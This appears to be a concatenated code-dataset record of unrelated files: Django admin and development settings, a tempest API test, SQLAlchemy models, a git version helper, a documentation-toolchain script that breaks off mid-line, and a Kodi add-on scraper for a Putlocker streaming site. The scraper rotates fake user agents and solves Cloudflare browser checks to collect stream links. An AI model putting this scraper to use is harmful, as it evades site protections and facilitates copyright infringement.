library.send_command(interface_record[interface].command_name, 'inline power power-by-class 3', chan=chan, configure=True) print("Wait")
apache-2.0
5,158,755,310,741,284,000
34.946237
134
0.638947
false
petterreinholdtsen/frikanalen
fkbeta/fk/admin.py
1
2538
# Copyright (c) 2012-2013 Benjamin Bruheim <[email protected]> # This file is covered by the LGPLv3 or later, read COPYING for details. from django.contrib import admin from django.contrib.auth.models import User from django.contrib.auth.admin import UserAdmin from fk.models import FileFormat from fk.models import Organization from fk.models import UserProfile from fk.models import Video, Category, Scheduleitem from fk.models import VideoFile from fk.models import SchedulePurpose, WeeklySlot # In order to display the userprofile on admin.site.unregister(User) class UserProfileInline(admin.StackedInline): model = UserProfile class UserProfileAdmin(UserAdmin): inlines = [ UserProfileInline, ] class VideoFileInline(admin.StackedInline): fields = ('format', 'filename', 'old_filename') #readonly_fields = ['format', 'filename'] model = VideoFile extra = 0 class VideoAdmin(admin.ModelAdmin): list_display = ('name', 'editor', 'organization') inlines = [VideoFileInline] search_fields = ["name", "description", "organization__name", "header", "editor__username"] list_filter = ("proper_import", "is_filler", "publish_on_web", "has_tono_records") class OrganizationAdmin(admin.ModelAdmin): list_display = ('name', 'fkmember', 'orgnr') filter_horizontal = ("members",) list_filter = ('fkmember',) ordering = ('name',) class ScheduleitemAdmin(admin.ModelAdmin): list_filter = ("starttime", ) list_display = ('__str__', 'video', 'schedulereason', 'starttime', 'duration') #list_display_links = ('starttime', 'video',) #inlines = [VideoInline] #exclude = ('video',) search_fields = ["video__name", "video__organization__name"] ordering = ('starttime',) class SchedulePurposeAdmin(admin.ModelAdmin): list_display = ( '__str__', 'videos_str', ) filter_horizontal = ('direct_videos',) class WeeklySlotAdmin(admin.ModelAdmin): list_display = ( '__str__', 'day', 'start_time', 'duration', 'purpose', ) admin.site.register(Category) admin.site.register(FileFormat) admin.site.register(Organization, OrganizationAdmin) admin.site.register(SchedulePurpose, SchedulePurposeAdmin) admin.site.register(Scheduleitem, ScheduleitemAdmin) admin.site.register(User, UserProfileAdmin) admin.site.register(Video, VideoAdmin) admin.site.register(VideoFile) admin.site.register(WeeklySlot, WeeklySlotAdmin)
lgpl-3.0
-431,953,171,379,978,940
31.126582
95
0.684791
false
janusnic/ecommerce
ecommerce/settings/local.py
1
4047
"""Development settings and globals.""" from __future__ import absolute_import import os from os.path import join, normpath from ecommerce.settings.base import * from ecommerce.settings.logger import get_logger_config # DEBUG CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug DEBUG = True # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug TEMPLATE_DEBUG = DEBUG # END DEBUG CONFIGURATION # EMAIL CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend' # END EMAIL CONFIGURATION # DATABASE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': normpath(join(DJANGO_ROOT, 'default.db')), 'USER': '', 'PASSWORD': '', 'HOST': '', 'PORT': '', 'ATOMIC_REQUESTS': True, } } # END DATABASE CONFIGURATION # CACHE CONFIGURATION # See: https://docs.djangoproject.com/en/dev/ref/settings/#caches CACHES = { 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', } } # END CACHE CONFIGURATION # TOOLBAR CONFIGURATION # See: http://django-debug-toolbar.readthedocs.org/en/latest/installation.html#explicit-setup if os.environ.get('ENABLE_DJANGO_TOOLBAR', False): INSTALLED_APPS += ( 'debug_toolbar', ) MIDDLEWARE_CLASSES += ( 'debug_toolbar.middleware.DebugToolbarMiddleware', ) DEBUG_TOOLBAR_PATCH_SETTINGS = False # http://django-debug-toolbar.readthedocs.org/en/latest/installation.html INTERNAL_IPS = ('127.0.0.1',) # END TOOLBAR CONFIGURATION # URL CONFIGURATION ECOMMERCE_URL_ROOT = 'http://localhost:8002' LMS_URL_ROOT = 'http://127.0.0.1:8000' # The location of the LMS heartbeat page LMS_HEARTBEAT_URL = get_lms_url('/heartbeat') # The location of the LMS student dashboard LMS_DASHBOARD_URL = get_lms_url('/dashboard') OAUTH2_PROVIDER_URL = get_lms_url('/oauth2') COMMERCE_API_URL = get_lms_url('/api/commerce/v1/') # END URL CONFIGURATION # AUTHENTICATION # Set these to the correct values for your OAuth2/OpenID Connect provider (e.g., devstack) SOCIAL_AUTH_EDX_OIDC_KEY = 'replace-me' SOCIAL_AUTH_EDX_OIDC_SECRET = 'replace-me' SOCIAL_AUTH_EDX_OIDC_URL_ROOT = OAUTH2_PROVIDER_URL SOCIAL_AUTH_EDX_OIDC_ID_TOKEN_DECRYPTION_KEY = SOCIAL_AUTH_EDX_OIDC_SECRET JWT_AUTH.update({ 'JWT_SECRET_KEY': 'insecure-secret-key', 'JWT_ISSUER': OAUTH2_PROVIDER_URL }) # END AUTHENTICATION # ORDER PROCESSING ENROLLMENT_API_URL = get_lms_url('/api/enrollment/v1/enrollment') ENROLLMENT_FULFILLMENT_TIMEOUT = 15 # devstack is slow! EDX_API_KEY = 'replace-me' # END ORDER PROCESSING # PAYMENT PROCESSING PAYMENT_PROCESSOR_CONFIG = { 'cybersource': { 'soap_api_url': 'https://ics2wstest.ic3.com/commerce/1.x/transactionProcessor/CyberSourceTransaction_1.115.wsdl', 'merchant_id': 'fake-merchant-id', 'transaction_key': 'fake-transaction-key', 'profile_id': 'fake-profile-id', 'access_key': 'fake-access-key', 'secret_key': 'fake-secret-key', 'payment_page_url': 'https://testsecureacceptance.cybersource.com/pay', 'receipt_page_url': get_lms_url('/commerce/checkout/receipt/'), 'cancel_page_url': get_lms_url('/commerce/checkout/cancel/'), }, 'paypal': { 'mode': 'sandbox', 'client_id': 'fake-client-id', 'client_secret': 'fake-client-secret', 'receipt_url': get_lms_url('/commerce/checkout/receipt/'), 'cancel_url': get_lms_url('/commerce/checkout/cancel/'), }, } # END PAYMENT PROCESSING ENABLE_AUTO_AUTH = True LOGGING = get_logger_config(debug=DEBUG, dev_env=True, local_loglevel='DEBUG') ##################################################################### # Lastly, see if the developer has any local overrides. try: from .private import * # pylint: disable=import-error except ImportError: pass
agpl-3.0
-3,845,165,324,190,291,000
27.907143
121
0.677045
false
mmasaki/trove
trove/tests/tempest/tests/api/versions/test_versions.py
1
1650
# Copyright 2014 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from tempest.lib import decorators from testtools import testcase as testtools from trove.tests.tempest.tests.api import base class DatabaseVersionsTest(base.BaseDatabaseTest): @classmethod def setup_clients(cls): super(DatabaseVersionsTest, cls).setup_clients() cls.client = cls.database_versions_client @testtools.attr('smoke') @decorators.idempotent_id('6952cd77-90cd-4dca-bb60-8e2c797940cf') def test_list_db_versions(self): versions = self.client.list_db_versions()['versions'] self.assertTrue(len(versions) > 0, "No database versions found") # List of all versions should contain the current version, and there # should only be one 'current' version current_versions = list() for version in versions: if 'CURRENT' == version['status']: current_versions.append(version['id']) self.assertEqual(1, len(current_versions)) self.assertIn(self.db_current_version, current_versions)
apache-2.0
-8,393,112,534,774,205,000
39.243902
78
0.704242
false
felipenaselva/repo.felipe
plugin.video.velocity/scrapers/putlocker_both.py
1
15716
import urllib2,urllib,re,os import random import urlparse import sys import xbmcplugin,xbmcgui,xbmc, xbmcaddon, downloader, extract, time import tools from libs import kodi from tm_libs import dom_parser from libs import log_utils import tools from libs import cloudflare from libs import log_utils from tm_libs import dom_parser import cookielib from StringIO import StringIO import gzip import main_scrape import base64 addon_id = kodi.addon_id timeout = int(kodi.get_setting('scraper_timeout')) tools.create_directory(tools.AOPATH, "All_Cookies/Putlocker") cookiepath = xbmc.translatePath(os.path.join('special://home','addons',addon_id,'All_Cookies','Putlocker/')) cookiejar = os.path.join(cookiepath,'cookies.lwp') cj = cookielib.LWPCookieJar() cookie_file = os.path.join(cookiepath,'cookies.lwp') def __enum(**enums): return type('Enum', (), enums) MAX_RESPONSE = 1024 * 1024 * 2 FORCE_NO_MATCH = '***FORCE_NO_MATCH***' QUALITIES = __enum(LOW='Low', MEDIUM='Medium', HIGH='High', HD720='HD720', HD1080='HD1080') XHR = {'X-Requested-With': 'XMLHttpRequest'} USER_AGENT = "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" BR_VERS = [ ['%s.0' % i for i in xrange(18, 43)], ['37.0.2062.103', '37.0.2062.120', '37.0.2062.124', '38.0.2125.101', '38.0.2125.104', '38.0.2125.111', '39.0.2171.71', '39.0.2171.95', '39.0.2171.99', '40.0.2214.93', '40.0.2214.111', '40.0.2214.115', '42.0.2311.90', '42.0.2311.135', '42.0.2311.152', '43.0.2357.81', '43.0.2357.124', '44.0.2403.155', '44.0.2403.157', '45.0.2454.101', '45.0.2454.85', '46.0.2490.71', '46.0.2490.80', '46.0.2490.86', '47.0.2526.73', '47.0.2526.80'], ['11.0']] WIN_VERS = ['Windows NT 10.0', 'Windows NT 7.0', 'Windows NT 6.3', 'Windows NT 6.2', 'Windows NT 6.1', 'Windows NT 6.0', 'Windows NT 5.1', 'Windows NT 5.0'] FEATURES = ['; WOW64', '; Win64; IA64', '; Win64; x64', ''] RAND_UAS = ['Mozilla/5.0 ({win_ver}{feature}; rv:{br_ver}) Gecko/20100101 Firefox/{br_ver}', 'Mozilla/5.0 ({win_ver}{feature}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{br_ver} Safari/537.36', 'Mozilla/5.0 ({win_ver}{feature}; Trident/7.0; rv:{br_ver}) like Gecko'] HOST_Q = {} HOST_Q[QUALITIES.LOW] = ['youwatch', 'allmyvideos', 'played.to', 'gorillavid'] HOST_Q[QUALITIES.MEDIUM] = ['primeshare', 'exashare', 'bestreams', 'flashx', 'vidto', 'vodlocker', 'thevideo', 'vidzi', 'vidbull', 'realvid', 'nosvideo', 'daclips', 'sharerepo', 'zalaa', 'filehoot', 'vshare'] HOST_Q[QUALITIES.HIGH] = ['vidspot', 'mrfile', 'divxstage', 'streamcloud', 'mooshare', 'novamov', 'mail.ru', 'vid.ag'] HOST_Q[QUALITIES.HD720] = ['thefile', 'sharesix', 'filenuke', 'vidxden', 'movshare', 'nowvideo', 'vidbux', 'streamin.to', 'allvid.ch'] HOST_Q[QUALITIES.HD1080] = ['hugefiles', '180upload', 'mightyupload', 'videomega', 'allmyvideos'] Q_ORDER = {QUALITIES.LOW: 1, QUALITIES.MEDIUM: 2, QUALITIES.HIGH: 3, QUALITIES.HD720: 4, QUALITIES.HD1080: 5} # base_url = 'http://www.santaseries.com' base_url = kodi.get_setting('putlocker_base_url') def format_source_label( item): if 'label' in item: return '[%s] %s (%s)' % (item['quality'], item['host'], item['label']) else: return '[%s] %s' % (item['quality'], item['host']) def _http_get(url, cookies=None, data=None, multipart_data=None, headers=None, allow_redirect=True, cache_limit=8): return get_cooked_url(url, base_url, timeout, cookies=cookies, data=data, multipart_data=multipart_data, headers=headers, allow_redirect=allow_redirect, cache_limit=cache_limit) def get_cooked_url(url, base_url, timeout, cookies=None, data=None, multipart_data=None, headers=None, allow_redirect=True, cache_limit=8): if cookies is None: cookies = {} if timeout == 0: timeout = None if headers is None: headers = {} referer = headers['Referer'] if 'Referer' in headers else url if kodi.get_setting('debug') == "true": log_utils.log('Getting Url: %s cookie=|%s| data=|%s| extra headers=|%s|' % (url, cookies, data, headers)) if data is not None: if isinstance(data, basestring): data = data else: data = urllib.urlencode(data, True) if multipart_data is not None: headers['Content-Type'] = 'multipart/form-data; boundary=X-X-X' data = multipart_data try: cj = _set_cookies(base_url, cookies) request = urllib2.Request(url, data=data) request.add_header('User-Agent', _get_ua()) #request.add_unredirected_header('Host', base_url) request.add_unredirected_header('Referer', referer) for key in headers: request.add_header(key, headers[key]) cj.add_cookie_header(request) if not allow_redirect: opener = urllib2.build_opener(NoRedirection) urllib2.install_opener(opener) else: opener = urllib2.build_opener(urllib2.HTTPRedirectHandler) urllib2.install_opener(opener) opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener2) response = urllib2.urlopen(request, timeout=timeout) cj.extract_cookies(response, request) if kodi.get_setting('debug') == "true": print 'Response Cookies: %s - %s' % (url, cookies_as_str(cj)) __fix_bad_cookies() cj.save(ignore_discard=True) if not allow_redirect and (response.getcode() in [301, 302, 303, 307] or response.info().getheader('Refresh')): if response.info().getheader('Refresh') is not None: refresh = response.info().getheader('Refresh') return refresh.split(';')[-1].split('url=')[-1] else: return response.info().getheader('Location') content_length = response.info().getheader('Content-Length', 0) if int(content_length) > MAX_RESPONSE: print 'Response exceeded allowed size. %s => %s / %s' % (url, content_length, MAX_RESPONSE) if response.info().get('Content-Encoding') == 'gzip': buf = StringIO(response.read(MAX_RESPONSE)) f = gzip.GzipFile(fileobj=buf) html = f.read() else: html = response.read(MAX_RESPONSE) except urllib2.HTTPError as e: if e.code == 503 and 'cf-browser-verification' in e.read(): print "WAS ERROR" html = cloudflare.solve(url, cj, _get_ua()) if not html: return '' else: print 'Error (%s) during THE scraper http get: %s' % (str(e), url) return '' except Exception as e: print 'Error (%s) during scraper http get: %s' % (str(e), url) return '' return html def get_url(url): request=urllib2.Request(url) request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36') response=urllib2.urlopen(request) link=response.read() cj.save(cookie_file, ignore_discard=True) response.close() return link def _get_ua(): index = random.randrange(len(RAND_UAS)) user_agent = RAND_UAS[index].format(win_ver=random.choice(WIN_VERS), feature=random.choice(FEATURES), br_ver=random.choice(BR_VERS[index])) print 'Creating New User Agent: %s' % (user_agent) return user_agent def _pathify_url(url): url = url.replace('\/', '/') pieces = urlparse.urlparse(url) if pieces.scheme: strip = pieces.scheme + ':' else: strip = '' strip += '//' + pieces.netloc url = url.replace(strip, '') if not url.startswith('/'): url = '/' + url url = url.replace('/./', '/') print "returning pathify "+ url return url def _default_get_episode_url(show_url, video, episode_pattern, title_pattern='', airdate_pattern='', data=None, headers=None): if 'http://' not in show_url: url = urlparse.urljoin(base_url, show_url) else: url = base_url+show_url html = get_url(url) if html: match = re.search(episode_pattern, html, re.DOTALL) if match: return _pathify_url(match.group(1)) else: log_utils.log('Skipping as Episode not found: %s' % (url), log_utils.LOGDEBUG) def make_vid_params(video_type, title, year, season, episode, ep_title, ep_airdate): return '|%s|%s|%s|%s|%s|%s|%s|' % (video_type, title, year, season, episode, ep_title, ep_airdate) def _set_cookies(base_url, cookies): cj = cookielib.LWPCookieJar(cookie_file) try: cj.load(ignore_discard=True) except: pass if kodi.get_setting('debug') == "true": print 'Before Cookies: %s' % (cookies_as_str(cj)) domain = urlparse.urlsplit(base_url).hostname for key in cookies: c = cookielib.Cookie(0, key, str(cookies[key]), port=None, port_specified=False, domain=domain, domain_specified=True, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=False, comment=None, comment_url=None, rest={}) cj.set_cookie(c) cj.save(ignore_discard=True) if kodi.get_setting('debug') == "true": print 'After Cookies: %s' % (cookies_as_str(cj)) return cj def cookies_as_str(cj): s = '' c = cj._cookies for domain in c: s += '{%s: ' % (domain) for path in c[domain]: s += '{%s: ' % (path) for cookie in c[domain][path]: s += '{%s=%s}' % (cookie, c[domain][path][cookie].value) s += '}' s += '} ' return s def __fix_bad_cookies(): c = cj._cookies for domain in c: for path in c[domain]: for key in c[domain][path]: cookie = c[domain][path][key] if cookie.expires > sys.maxint: print 'Fixing cookie expiration for %s: was: %s now: %s' % (key, cookie.expires, sys.maxint) cookie.expires = sys.maxint def get_quality(video, host, base_quality=None): host = host.lower() # Assume movies are low quality, tv shows are high quality if base_quality is None: if video.video_type == "movies": quality = QUALITIES.LOW else: quality = QUALITIES.HIGH else: quality = base_quality host_quality = None if host: for key in HOST_Q: if any(hostname in host for hostname in HOST_Q[key]): host_quality = key break if host_quality is not None and Q_ORDER[host_quality] < Q_ORDER[quality]: quality = host_quality return quality ################ Below is custome Changes per Scraper################# def _get_episode_url(show_url, video,season,episode): episode_pattern = 'href="([^"]+season-%s-episode-%s-[^"]+)' % (season, episode) title_pattern = 'href="(?P<url>[^"]+season-\d+-episode-\d+-[^"]+).*?&nbsp;\s+(?P<title>.*?)</td>' return _default_get_episode_url(show_url, video, episode_pattern, title_pattern) def search(video_type, title, year): search_url = urlparse.urljoin(base_url, '/search/advanced_search.php?q=%s' % (urllib.quote_plus(title))) if not year: year = 'Year' search_url += '&year_from=%s&year_to=%s' % (year, year) if video_type == "shows": search_url += '&section=2' else: search_url += '&section=1' html = _http_get(search_url, cache_limit=.25) results = [] if not re.search('Sorry.*?find.*?looking\s+for', html, re.I): r = re.search('Search Results For: "(.*?)</table>', html, re.DOTALL) if r: fragment = r.group(1) pattern = r'<a\s+href="([^"]+)"\s+title="([^"]+)' for match in re.finditer(pattern, fragment): url, title_year = match.groups('') match = re.search('(.*)\s+\((\d{4})\)', title_year) if match: match_title, match_year = match.groups() else: match_title = title_year match_year = '' result = {'url': _pathify_url(url), 'title': match_title, 'year': match_year} results.append(result) results = dict((result['url'], result) for result in results).values() return results def get_sources(video): source_url = urlparse.urljoin(base_url, video) #source_url = get_url(video) hosters = [] if source_url and source_url != FORCE_NO_MATCH: url = urlparse.urljoin(base_url, source_url) html = _http_get(url, cache_limit=.5) for match in re.finditer('<a[^>]+href="([^"]+)[^>]+>(Version \d+)<', html): url, version = match.groups() host = urlparse.urlsplit(url).hostname.replace('embed.', '') hoster = {'hostname':'Putlocker','multi-part': False, 'host': host, 'quality': get_quality(video, host, QUALITIES.HIGH), 'views': None, 'rating': None, 'url': url, 'direct': False} hoster['version'] = version hosters.append(hoster) return hosters def putlocker_tv(name,movie_title): try: title = movie_title[:-7] movie_year = movie_title[-6:] year = movie_year.replace('(','').replace(')','') video_type = 'shows' show_url = search(video_type,title,year) for e in show_url: url = e['url'] newseas=re.compile('S(.+?)E(.+?) (?P<name>[A-Za-z\t .]+)').findall(name) print newseas for sea,epi,epi_title in newseas: video = make_vid_params('Episode',title,year,sea,epi,epi_title,'') ep_url = _get_episode_url(url, video,sea,epi) hosters=get_sources(ep_url) hosters = main_scrape.apply_urlresolver(hosters) return hosters except Exception as e: hosters =[] log_utils.log('Error [%s] %s' % (str(e), ''), xbmc.LOGERROR) if kodi.get_setting('error_notify') == "true": kodi.notify(header='Putlocker TV',msg='(error) %s %s' % (str(e), ''),duration=5000,sound=None) return hosters def putlocker_movies(movie_title): try: title = movie_title[:-7] movie_year = movie_title[-6:] year = movie_year.replace('(','').replace(')','') video_type = 'movies' show_url = search(video_type,title,year) for e in show_url: url = e['url'] hosters=get_sources(url) print "HOSTERS ARE " + str(hosters) hosters = main_scrape.apply_urlresolver(hosters) return hosters except Exception as e: hosters =[] log_utils.log('Error [%s] %s' % (str(e), ''), xbmc.LOGERROR) if kodi.get_setting('error_notify') == "true": kodi.notify(header='Putlocker Movies',msg='(error) %s %s' % (str(e), ''),duration=5000,sound=None) return hosters
gpl-2.0
3,591,408,890,174,926,000
40.033943
197
0.563311
false
melodous/designate
designate/sqlalchemy/models.py
1
1881
# Copyright 2012 Hewlett-Packard Development Company, L.P. # # Author: Patrick Galbraith <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from oslo.db.sqlalchemy import models from oslo.db import exception as oslo_db_exc from sqlalchemy import Column, DateTime from sqlalchemy.exc import IntegrityError from sqlalchemy.types import CHAR from designate.openstack.common import timeutils from designate import exceptions class Base(models.ModelBase): # TODO(ekarlso): Remove me when o.db patch lands for this. def save(self, session): """Save this object""" session.add(self) try: session.flush() except oslo_db_exc.DBDuplicateEntry as e: raise exceptions.Duplicate(str(e)) except IntegrityError: raise def delete(self, session): session.delete(self) session.flush() # TODO(ekarlso): Get this into o.db? class SoftDeleteMixin(object): deleted = Column(CHAR(32), nullable=False, default="0", server_default="0") deleted_at = Column(DateTime, nullable=True, default=None) def soft_delete(self, session): """Mark this object as deleted.""" self.deleted = self.id.replace('-', '') self.deleted_at = timeutils.utcnow() if hasattr(self, 'status'): self.status = "DELETED" self.save(session=session)
apache-2.0
-4,693,961,072,000,867,000
32
79
0.694312
false
biocore/verman
verman/__init__.py
1
9290
#!/usr/bin/env python #----------------------------------------------------------------------------- # Copyright (c) 2013, The BiPy Development Team. # # Distributed under the terms of the Modified BSD License. # # The full license is in the file COPYING.txt, distributed with this software. #----------------------------------------------------------------------------- __credits__ = ["Daniel McDonald", "Jai Ram Rideout", "Yoshiki Vazquez Baeza"] import os import subprocess class Version(object): """Represent module version information This is inspired by Python's sys.version_info """ def __init__(self, package, major, minor, micro=None, releaselevel=None, init_file=None): if not isinstance(package, str): raise TypeError("Package must be a string") if not isinstance(major, int): raise TypeError("Major version must be an integer") if not isinstance(minor, int): raise TypeError("Minor version must be an integer") if micro is not None and not isinstance(micro, int): raise TypeError("Micro version must be an integer") if releaselevel is not None and not isinstance(releaselevel, str): raise TypeError("Releaselevel must be a string") if init_file is not None and not os.path.exists(init_file): raise ValueError("init_file must exist if provided") self.package = package self.major = major self.minor = minor self.micro = micro self.releaselevel = releaselevel self.init_file = init_file @property def mmm(self): """major.minor.micro version string""" if self.micro is None: return "%d.%d" % (self.major, self.minor) else: return "%d.%d.%d" % (self.major, self.minor, self.micro) def __str__(self): """Return a version string""" if self.micro is None: base = "%d.%d" % (self.major, self.minor) else: base = "%d.%d.%d" % (self.major, self.minor, self.micro) if self.releaselevel is not None: base = "%s-%s" % (base, self.releaselevel) git_branch = self.git_branch() git_sha1 = self.git_sha1() if git_branch is not None: return "%s, %s@%s" % (base, git_branch, git_sha1) else: return base def __repr__(self): """Return version information similar to Python's sys.version_info""" name = "%s_version" % self.package major = "major=%d" % self.major minor = "minor=%d" % self.minor items = [major, minor] if self.micro is not None: items.append("micro=%s" % self.micro) if self.releaselevel is not None: items.append("releaselevel='%s'" % self.releaselevel) git_branch = self.git_branch() git_sha1 = self.git_sha1(truncate=False) if git_branch is not None: git_branch = "git_branch='%s'" % git_branch git_sha1 = "git_sha1='%s'" % git_sha1 items.append(git_branch) items.append(git_sha1) return "%s(%s)" % (name, ', '.join(items)) def git_branch(self): """Get the current branch (if applicable) This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has given explicit permission for this code to be licensed under BSD. The discussion can be found here https://github.com/wasade/verman/issues/1 """ if self.init_file is None: return None pkg_dir = self.package_dir() branch_cmd = 'git --git-dir %s/.git rev-parse --abbrev-ref HEAD' %\ (pkg_dir) branch_o, branch_e, branch_r = self.verman_system_call(branch_cmd) git_branch = branch_o.strip() if self._is_valid_git_refname(git_branch): return git_branch else: return None def git_sha1(self, truncate=True): """Get the current git SHA1 (if applicable) This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has given explicit permission for this code to be licensed under BSD. The discussion can be found here https://github.com/wasade/verman/issues/1 """ if self.init_file is None: return None pkg_dir = self.package_dir() sha_cmd = 'git --git-dir %s/.git rev-parse HEAD' % (pkg_dir) sha_o, sha_e, sha_r = self.verman_system_call(sha_cmd) git_sha = sha_o.strip() if self._is_valid_git_sha1(git_sha): if truncate: return git_sha[0:7] else: return git_sha else: return None def _is_valid_git_refname(self, refname): """check if a string is a valid branch-name/ref-name for git Input: refname: string to validate Output: True if 'refname' is a valid branch name in git. False if it fails to meet any of the criteria described in the man page for 'git check-ref-format', also see: http://www.kernel.org/pub/software/scm/git/docs/git-check-ref-format.html This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has given explicit permission for this code to be licensed under BSD. The discussion can be found here https://github.com/wasade/verman/issues/1 """ if len(refname) == 0: return False # git imposes a few requirements to accept a string as a # refname/branch-name # They can include slash / for hierarchical (directory) grouping, but no # slash-separated component can begin with a dot . or end with the # sequence .lock if (len([True for element in refname.split('/') if element.startswith('.') or element.endswith('.lock')]) != 0): return False # They cannot have two consecutive dots .. anywhere if '..' in refname: return False # They cannot have ASCII control characters (i.e. bytes whose values are # lower than \040, or \177 DEL), space, tilde, caret ^, or colon : # anywhere if len([True for refname_char in refname if ord(refname_char) < 40 or ord(refname_char) == 177]) != 0: return False if ' ' in refname or '~' in refname or '^' in refname or ':' in refname: return False # They cannot have question-mark ?, asterisk *, or open bracket [ # anywhere if '?' in refname or '*' in refname or '[' in refname: return False # They cannot begin or end with a slash / or contain multiple # consecutive slashes if refname.startswith('/') or refname.endswith('/') or '//' in refname: return False # They cannot end with a dot .. if refname.endswith('.'): return False # They cannot contain a sequence @{ if '@{' in refname: return False # They cannot contain a \ if '\\' in refname: return False return True def _is_valid_git_sha1(self, possible_hash): """check if a string is a valid git sha1 string Input: possible_hash: string to validate Output: True if the string has 40 characters and is an hexadecimal number, False otherwise. This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has given explicit permission for this code to be licensed under BSD. The discussion can be found here https://github.com/wasade/verman/issues/1 """ if len(possible_hash) != 40: return False try: _ = int(possible_hash, 16) except ValueError: return False return True def package_dir(self): """Returns the top-level package directory This code was adapted from QIIME. The author, Greg Caporaso, has given explicit permission for this code to be licensed under BSD. The discussion can be found here: https://github.com/wasade/verman/issues/1 """ # Get the full path of the module containing an instance of Version if self.init_file is None: return None current_file_path = os.path.abspath(self.init_file) # Get the directory current_dir_path = os.path.dirname(current_file_path) # Return the directory containing the directory containing the instance return os.path.dirname(current_dir_path) def verman_system_call(self, cmd): """Issue a system call This code is based off of pyqi's pyqi_system_call """ proc = subprocess.Popen(cmd, shell=True, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # communicate pulls all stdout/stderr from the PIPEs to # avoid blocking -- don't remove this line! stdout, stderr = proc.communicate() return_value = proc.returncode return stdout, stderr, return_value verman_version = Version("verman", 1, 1, 1, init_file=__file__) __version__ = verman_version.mmm
bsd-3-clause
-6,532,921,692,975,337,000
33.535316
93
0.583423
false
marble/Toolchain_RenderDocumentation
12-Get-ready-for-the-project/run_35-Define-general-values.py
1
8699
#!/usr/bin/env python # coding: utf-8 from __future__ import print_function from __future__ import absolute_import import os import sys import tct from tct import deepget ospj = os.path.join params = tct.readjson(sys.argv[1]) facts = tct.readjson(params['factsfile']) milestones = tct.readjson(params['milestonesfile']) reason = '' resultfile = params['resultfile'] result = tct.readjson(resultfile) toolname = params['toolname'] toolname_pure = params['toolname_pure'] toolchain_name = facts['toolchain_name'] workdir = params['workdir'] loglist = result['loglist'] = result.get('loglist', []) exitcode = CONTINUE = 0 # ================================================== # Make a copy of milestones for later inspection? # -------------------------------------------------- if 0 or milestones.get('debug_always_make_milestones_snapshot'): tct.make_snapshot_of_milestones(params['milestonesfile'], sys.argv[1]) # ================================================== # Helper functions # -------------------------------------------------- def firstNotNone(*args): for arg in args: if arg is not None: return arg else: return None def lookup(D, *keys, **kwdargs): result = deepget(D, *keys, **kwdargs) loglist.append((keys, result)) return result def findRunParameter(key, default=None, D=None): result = firstNotNone( deepget(milestones, key, default=None), deepget(facts, 'run_command', key, default=None), deepget(milestones, 'jobfile_data', 'tctconfig', key, default=None), deepget(facts, 'tctconfig', configset, key, default=None), default, None) # deliberate side effect if isinstance(D, dict): D[key] = result return result ATNM = all_the_new_milestones = {} # ================================================== # define # -------------------------------------------------- # buildsettings_builddir_root = /ALL/dummy_webroot buildsettings_builddir = '' checksum_ttl_seconds = 86400 * 7 # render if last checksum calculation is older gitdir_must_start_with = '/home/mbless/HTDOCS/:/home/marble/Repositories/:/tmp/' lockfile_ttl_seconds = 1800 relative_part_of_builddir = '' TheProjectCacheDir = None url_of_webroot = 'https://docs.typo3.org/' webroot_abspath = '/ALL/dummy_webroot' xeq_name_cnt = 0 email_user_do_not_send = 0 email_user_receivers_exlude_list = [ '[email protected]', '[email protected]', '[email protected]', '[email protected]', ] general_string_options = ( ('conf_py_masterfile', ''), ('email_admin', '[email protected]'), ('email_user_bcc', ''), ('email_user_cc', ''), ('email_user_to_instead', ''), ('oo_parser', 'dl'), # dl | flt ) general_int_options = ( ('email_admin_send_extra_mail', 0), ('email_user_do_not_send', 0), ('make_latex', 1), ('make_package', 1), ('make_pdf', 1), ('make_singlehtml', 1), ('rebuild_needed', 0), ('replace_static_in_html', 0), ) general_csvlist_options = ( ('email_user_receivers_exlude_list', ''), ) SYMLINK_THE_MAKEDIR = None SYMLINK_THE_OUTPUT = None SYMLINK_THE_PROJECT = None # ================================================== # Check params # -------------------------------------------------- if exitcode == CONTINUE: loglist.append('CHECK PARAMS') # relative_part_of_builddir = lookup(facts, 'tctconfig', configset, 'relative_part_of_builddir', default=relative_part_of_builddir) buildsettings_builddir = lookup(milestones, 'buildsettings', 'builddir', default=buildsettings_builddir) configset = lookup(milestones, 'configset') makedir_abspath = lookup(milestones, 'makedir_abspath') url_of_webroot = lookup(facts, 'tctconfig', 'configset', 'url_of_webroot', default=url_of_webroot) webroot_abspath = lookup(facts, 'tctconfig', 'configset', 'webroot_abspath', default=webroot_abspath) if not (1 and buildsettings_builddir and configset and makedir_abspath and url_of_webroot and webroot_abspath ): exitcode = 22 reason = 'Bad PARAMS or nothing to do' if exitcode == 